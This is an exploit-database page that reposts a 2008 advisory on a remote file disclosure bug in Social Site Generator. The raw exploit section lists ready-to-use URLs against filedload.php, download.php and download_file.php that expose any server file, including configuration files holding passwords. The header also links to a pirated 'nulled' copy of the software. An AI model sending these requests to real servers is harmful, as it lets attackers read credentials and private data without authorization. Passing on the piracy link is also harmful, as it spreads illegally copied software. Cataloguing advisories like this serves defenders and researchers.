header-logo
Suggest Exploit
vendor:
Social Site Generator
by:
Stack & Jadi
7.5
CVSS
HIGH
Remote File disclouse
N/A
CWE
Product Name: Social Site Generator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Social Site Generator Remote File disclouse

A vulnerability in Social Site Generator allows an attacker to view the source code of any file on the server by appending the file name to the filedload.php, download.php, or download_file.php URL. This can be used to view the source code of any file on the server, including configuration files containing passwords and other sensitive information.

Mitigation:

Ensure that the web server is configured to deny access to files that should not be publicly accessible.
Source

Exploit-DB raw data:

############################################################################################
# 
# Application Name         : Social Site Generator
#
# Download                 : http://rapidshare.com/files/118424866/Social.Site.Generator.v2._iAG_.Nulled.rar
#
# Vulnerable Type          : Remote File disclouse
#
# Dork                     : search it :p
#
# Vulnerable file          : filedload.php
#
# author                   : Stack & Jadi
#
# Team                     : v4 Team http://v4-team.com
#
# THNX                     : ALLAH
#Greetz : Houssamix & Djekmani & Jadi & iuoisn &Room-Hackers All muslims HaCkeRs  :)
#                               www.v4-team.com     &    www.Real-Hack.com   &    www.Tryag.com
#
#
############################################################################################
< ------------------- Stack ------------------- >|
\        /                                                          |
  \    /          Wanted                           |
    \/__________________________________|

< -- Bug -- >
Exploit :
http://target/path/filedload.php?file=filedload.php
http://target/path/webadmin/download.php?file=download.php
http://target/path/webadmin/download_file.php

# milw0rm.com [2008-06-01]

Navigation

Suggest Exploit

Services By CQR